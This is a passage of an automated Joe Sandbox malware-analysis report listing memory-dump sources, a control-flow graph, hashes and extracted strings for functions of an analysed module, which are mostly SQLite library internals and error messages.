                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727176190.00007FFBA4561000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBA4560000, based on PE: true
                                                            • Associated: 00000004.00000002.2727111159.00007FFBA4560000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727243281.00007FFBA457C000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727309418.00007FFBA4589000.00000004.00000001.01000000.00000024.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727381495.00007FFBA458F000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4560000_Mai.jbxd
                                                            Similarity
                                                            • API ID: FreeLibraryfree
                                                            • String ID:
                                                            • API String ID: 155010425-0
                                                            • Opcode ID: b7d208bddb73d87533deb9cdba8771a99ab3487d009f0975f4f29743c7270e54
                                                            • Instruction ID: ac652493696dd3c54c05e80f6b488eba78213bf8ee49d00801f93e0ca47e9f07
                                                            • Opcode Fuzzy Hash: b7d208bddb73d87533deb9cdba8771a99ab3487d009f0975f4f29743c7270e54
                                                            • Instruction Fuzzy Hash: 55E0ECA1A1B605C6EB1B8F72D8942382260FB4AF85F180830CE0D062B08F3CD4C6C340
                                                            Function 00007FFBA45B0180 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 497 7ffba45b0180-7ffba45b01b2 GetSystemInfo 498 7ffba45b01b4-7ffba45b01b6 497->498 499 7ffba45b01b8-7ffba45b01c9 497->499 500 7ffba45b01d4-7ffba45b01e5 498->500 499->500 504 7ffba45b01cb 499->504 502 7ffba45b01e7-7ffba45b01ee 500->502 503 7ffba45b01f0-7ffba45b01f3 500->503 505 7ffba45b0225-7ffba45b0236 502->505 503->505 506 7ffba45b01f5-7ffba45b01fd 503->506 504->500 507 7ffba45b0248-7ffba45b024f 505->507 508 7ffba45b0238-7ffba45b0241 505->508 509 7ffba45b0214-7ffba45b0218 506->509 510 7ffba45b01ff 506->510 512 7ffba45b0255-7ffba45b0266 507->512 513 7ffba45b0251-7ffba45b0253 507->513 508->507 509->505 511 7ffba45b021a-7ffba45b0221 509->511 514 7ffba45b0203-7ffba45b0206 510->514 511->505 524 7ffba45b0268 512->524 525 7ffba45b0271 512->525 516 7ffba45b0278-7ffba45b0282 513->516 514->509 517 7ffba45b0208-7ffba45b0212 514->517 519 7ffba45b0294-7ffba45b0297 516->519 520 7ffba45b0284-7ffba45b0292 516->520 517->509 517->514 522 7ffba45b0299-7ffba45b02a1 519->522 523 7ffba45b02df-7ffba45b02e9 519->523 521 7ffba45b02c9-7ffba45b02cc 520->521 521->523 528 7ffba45b02ce-7ffba45b02dd 521->528 526 7ffba45b02a3 522->526 527 7ffba45b02b8-7ffba45b02bc 522->527 529 7ffba45b02f0-7ffba45b02f3 523->529 524->525 525->516 530 7ffba45b02a7-7ffba45b02aa 526->530 527->521 531 7ffba45b02be-7ffba45b02c5 527->531 528->529 532 7ffba45b0305-7ffba45b030c 529->532 533 7ffba45b02f5-7ffba45b02fe 529->533 530->527 534 7ffba45b02ac-7ffba45b02b6 530->534 531->521 535 7ffba45b030e-7ffba45b0310 532->535 536 7ffba45b0312-7ffba45b0323 532->536 533->532 534->527 534->530 537 7ffba45b0335-7ffba45b033f 535->537 542 7ffba45b0325 536->542 543 7ffba45b032e 536->543 540 7ffba45b0351-7ffba45b0354 537->540 541 7ffba45b0341-7ffba45b034f 537->541 545 7ffba45b0356-7ffba45b035e 540->545 546 7ffba45b039c-7ffba45b03a6 540->546 544 7ffba45b0386-7ffba45b0389 541->544 542->543 543->537 544->546 547 7ffba45b038b-7ffba45b039a 544->547 549 7ffba45b0375-7ffba45b0379 545->549 550 7ffba45b0360 545->550 548 7ffba45b03ad-7ffba45b03b0 546->548 547->548 551 7ffba45b03c2-7ffba45b03c9 548->551 552 7ffba45b03b2-7ffba45b03bb 548->552 549->544 554 7ffba45b037b-7ffba45b0382 549->554 553 7ffba45b0364-7ffba45b0367 550->553 555 7ffba45b03cb-7ffba45b03cd 551->555 556 7ffba45b03cf-7ffba45b03e0 551->556 552->551 553->549 557 7ffba45b0369-7ffba45b0373 553->557 554->544 559 7ffba45b03f2-7ffba45b03fc 555->559 566 7ffba45b03eb 556->566 567 7ffba45b03e2 556->567 557->549 557->553 561 7ffba45b040e-7ffba45b0411 559->561 562 7ffba45b03fe-7ffba45b040c 559->562 564 7ffba45b0413-7ffba45b041b 561->564 565 7ffba45b0459-7ffba45b0460 561->565 563 7ffba45b0443-7ffba45b0446 562->563 563->565 570 7ffba45b0448-7ffba45b0457 563->570 568 7ffba45b041d 564->568 569 7ffba45b0432-7ffba45b0436 564->569 571 7ffba45b0467-7ffba45b046a 565->571 566->559 567->566 572 7ffba45b0421-7ffba45b0424 568->572 569->563 573 7ffba45b0438-7ffba45b043f 569->573 570->571 574 7ffba45b0475-7ffba45b047c 571->574 575 7ffba45b046c 571->575 572->569 576 7ffba45b0426-7ffba45b0430 572->576 573->563 577 7ffba45b047e-7ffba45b0490 574->577 578 7ffba45b0491-7ffba45b04aa 574->578 575->574 576->569 576->572
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                            • Instruction ID: 467e86eeb7400a1cab56accad6a92f20c2e86bf05d72737a23dcee0e4f264d25
                                                            • Opcode Fuzzy Hash: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                            • Instruction Fuzzy Hash: 66A1E8E5A0BB07C1EE5A8B69E8D433823D1BF45F40F585575CD8E067B0EFACA49A8240

                                                            Non-executed Functions

                                                            Function 00007FFBA45CC720 Relevance: 12.4, APIs: 1, Strings: 7, Instructions: 403COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                            • API String ID: 2221118986-741541785
                                                            • Opcode ID: 929b51b88e2f19a1b25798b663a6f8a6c4e4772c4a7f5eb79516f13274e760a1
                                                            • Instruction ID: 5a6b889a199f4e1899f3d8b98a7f79cdb9e0f5f333335654466f3643de4248e6
                                                            • Opcode Fuzzy Hash: 929b51b88e2f19a1b25798b663a6f8a6c4e4772c4a7f5eb79516f13274e760a1
                                                            • Instruction Fuzzy Hash: EB02BEB2A0A641CAE716CB79E88467E77A1FB85748F14413ADE4E47BA4DF7CE441CB00
                                                            Function 00007FFBA45C62B0 Relevance: 6.6, APIs: 5, Instructions: 360COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            • Opcode ID: 016bcaee659f030f6ebf97f502d967f123d0fb2ac23bd50cea733b68470f3523
                                                            • Instruction ID: bec5ac93e1b87ef51b213eb3936082a5ed645eb64dfdeaacd1e29d4e8274ee51
                                                            • Opcode Fuzzy Hash: 016bcaee659f030f6ebf97f502d967f123d0fb2ac23bd50cea733b68470f3523
                                                            • Instruction Fuzzy Hash: 57E1D1B261E781CAE7928F35D08476E77A1FB44B84F148036EE4E477A6DE3DE5458300
                                                            Function 00007FFBA4650080 Relevance: 25.7, APIs: 1, Strings: 16, Instructions: 234COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FFBA45EB120: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00007FFBA4655D3A,?,?,?,?,?,00007FFBA45EAEC2), ref: 00007FFBA45EB2C8
                                                              • Part of subcall function 00007FFBA45EAC10: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FFBA45E535C), ref: 00007FFBA45EAD7A
                                                              • Part of subcall function 00007FFBA45EAC10: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FFBA45E535C), ref: 00007FFBA45EAE06
                                                            • memcpy.VCRUNTIME140 ref: 00007FFBA4650402
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: FILTER clause may only be used with aggregate window functions$L$RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression$U$U$Y$Z$Z$cume_dist$dense_rank$lag$lead$ntile$percent_rank$rank$row_number
                                                            • API String ID: 3510742995-2880407920
                                                            • Opcode ID: da666670fab5f20300870dbcc3b51ffe10f858a8b1fe0458a16c7cd44fa11382
                                                            • Instruction ID: 6089ce85256e69ebcf2b9d402f5f01077981055c650862542a07c0ac484896f6
                                                            • Opcode Fuzzy Hash: da666670fab5f20300870dbcc3b51ffe10f858a8b1fe0458a16c7cd44fa11382
                                                            • Instruction Fuzzy Hash: CFB180B2A0AB81DAE7628F79E99026A37A0FB44744F006175DF9D07BA5DF3CE0658701
                                                            Function 00007FFBA461A0F0 Relevance: 16.9, APIs: 2, Strings: 9, Instructions: 384COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                            • API String ID: 0-3733955532
                                                            • Opcode ID: f4df1b385be62000698d571df5cd47008488a1312fd782e40bbd37ae16b60806
                                                            • Instruction ID: 77c804d4ee2ae8fae696e35da1286f1a31719e3373cb261f4f7ed9acf2bf668f
                                                            • Opcode Fuzzy Hash: f4df1b385be62000698d571df5cd47008488a1312fd782e40bbd37ae16b60806
                                                            • Instruction Fuzzy Hash: F702A2A5A0AA82C1EA568B3DEC9427973A0FF46B85F485176DD8E473B5DF7CE448C300
                                                            Function 00007FFBA45D8D10 Relevance: 15.3, APIs: 2, Strings: 8, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                            • API String ID: 3510742995-875588658
                                                            • Opcode ID: 50ca7b058fd646b615b437ac80f3dd14da60ada7258248d4b5f410bfe11147b9
                                                            • Instruction ID: a6a134f5c22f4385a1ab481bbdea3ccc55de58a679e36d61a4b97f933d096c28
                                                            • Opcode Fuzzy Hash: 50ca7b058fd646b615b437ac80f3dd14da60ada7258248d4b5f410bfe11147b9
                                                            • Instruction Fuzzy Hash: 72E180B2F0A652DAFB26CFB4D4847BD27A1AF04748F044136DE1E53AA9DE3CA449C740
                                                            Function 00007FFBA45E06C0 Relevance: 14.0, APIs: 1, Strings: 8, Instructions: 487COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                            • API String ID: 2221118986-554953066
                                                            • Opcode ID: 730e8d11a6e24fee74aadef8f820dc0e96c8f802cede018c9e60813f8b1e2d1d
                                                            • Instruction ID: 803b12de6702f426374d208d7dc141bbc77f850df3108cdf7f4fceda2b768cf6
                                                            • Opcode Fuzzy Hash: 730e8d11a6e24fee74aadef8f820dc0e96c8f802cede018c9e60813f8b1e2d1d
                                                            • Instruction Fuzzy Hash: CE329AB2A0AB91C6EBA6CF35C6816A937E4FB48B84F405136DE8D477A5DF38E450C700
                                                            Function 00007FFBA45FF070 Relevance: 12.4, APIs: 1, Strings: 7, Instructions: 405COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                            • API String ID: 3510742995-2846519077
                                                            • Opcode ID: 13fd3e058da161b1aa0f62860385a377fb23014bbc18c08008aba194cc5e7079
                                                            • Instruction ID: c128ac5967cca3a2ce60d5f6d306d0ffc3b011a57e4bddba0c2e5cbbe3a487cb
                                                            • Opcode Fuzzy Hash: 13fd3e058da161b1aa0f62860385a377fb23014bbc18c08008aba194cc5e7079
                                                            • Instruction Fuzzy Hash: 2C02CEA2A0A682C6EB62DF35D4807A93791FB85F88F444236CE4D47BA5DF3CE549C701
                                                            Function 00007FFBA45F5F70 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 302COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: "%w" $%Q%s
                                                            • API String ID: 438689982-1987291987
                                                            • Opcode ID: c386c09e3d4df8f073a94f50c266d64f9e222731bb102df69f40d6c4415e9e9e
                                                            • Instruction ID: 3486f52f24837d2159fdd7c53f37da2cd5a2c9af2a1c6b12de92cb3f0f2e9629
                                                            • Opcode Fuzzy Hash: c386c09e3d4df8f073a94f50c266d64f9e222731bb102df69f40d6c4415e9e9e
                                                            • Instruction Fuzzy Hash: EEC1C4A1A0AB82C6EA16CF65E48067967A0FF45BA0F544239DE6D077E5DF3CE44AC700
                                                            Function 00007FFBA45BF7B0 Relevance: 12.3, APIs: 5, Strings: 3, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: ad0c9925f5f763d59eb461d465fc699a4c272932b870f6f2613455510c5e3eb7
                                                            • Instruction ID: 4250ff09d78742e1ad4136afa6e6ed76f5ab23a6f178ccced3002e4017ccc6f0
                                                            • Opcode Fuzzy Hash: ad0c9925f5f763d59eb461d465fc699a4c272932b870f6f2613455510c5e3eb7
                                                            • Instruction Fuzzy Hash: 36A124B3A0E2D18AD7668B68D4946BE7B91FB81780F044135DF8AC3691EF7CE546C710
                                                            Function 00007FFBA4621020 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 331COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                            • API String ID: 3510742995-879093740
                                                            • Opcode ID: c9e795dc4d123c262b175c945ba407815cf108cd462a88b84e0acb70f777678b
                                                            • Instruction ID: 28fb70633d7a6b07ebad418562a8045bd78abb3651c4d565113e789c2a80c536
                                                            • Opcode Fuzzy Hash: c9e795dc4d123c262b175c945ba407815cf108cd462a88b84e0acb70f777678b
                                                            • Instruction Fuzzy Hash: 60E1BDA2F0AB82EAEB12CB39C9806BD27A5FB44B84F055275DE4C177A5DF38E451C340
                                                            Function 00007FFBA4603470 Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 330COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • foreign key on %s should reference only one column of table %T, xrefs: 00007FFBA46034F5
                                                            • unknown column "%s" in foreign key definition, xrefs: 00007FFBA460380C
                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFBA460351E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                            • API String ID: 438689982-272990098
                                                            • Opcode ID: 0f1ae6706e2e64d0062df6b9c75ebbb5e997ac9397ddfcf155c0f8c1908f2499
                                                            • Instruction ID: a8838e50c1ac76d2f935dc0fd2e43f49ac1c49153e9bd42631fafe99b8110fda
                                                            • Opcode Fuzzy Hash: 0f1ae6706e2e64d0062df6b9c75ebbb5e997ac9397ddfcf155c0f8c1908f2499
                                                            • Instruction Fuzzy Hash: 28D1F4E2A0AB81D2EB668B29D88477927A1FB85BC5F44A175DE5D037A5DF3CE580C300
                                                            Function 00007FFBA45EDFB0 Relevance: 9.3, APIs: 2, Strings: 4, Instructions: 309COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %sSCALAR SUBQUERY %d$CORRELATED $Expression tree is too large (maximum depth %d)$REUSE SUBQUERY %d
                                                            • API String ID: 0-875495356
                                                            • Opcode ID: b84f660d529b277a8f07fa2363deb352529174e458e0e2df612b0ec082612bfb
                                                            • Instruction ID: a2e0f4182721068632973f2cbb38f215883f2055d8e1badf1d694f973502ed9b
                                                            • Opcode Fuzzy Hash: b84f660d529b277a8f07fa2363deb352529174e458e0e2df612b0ec082612bfb
                                                            • Instruction Fuzzy Hash: CFD1ADB2A19781CBE756CF36DA8126A77A1FB89784F049235DE4D43BA5DF38E490C700
                                                            Function 00007FFBA45C3D10 Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 438689982-3764764234
                                                            • Opcode ID: 1387ee26437fe0bb48c9d3c51bd20c38da24827126420e40ab13e574651dee3f
                                                            • Instruction ID: 9055b63feae9807204c2a5e1e9afad1ab7e0b419061462c4a865789063d66afd
                                                            • Opcode Fuzzy Hash: 1387ee26437fe0bb48c9d3c51bd20c38da24827126420e40ab13e574651dee3f
                                                            • Instruction Fuzzy Hash: A6B1CFB2A0A696C6D762CB2AE084B7B77A5FB48B84F114035DE4D47BA6DF39E440C700
                                                            Function 00007FFBA45F5010 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 215COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
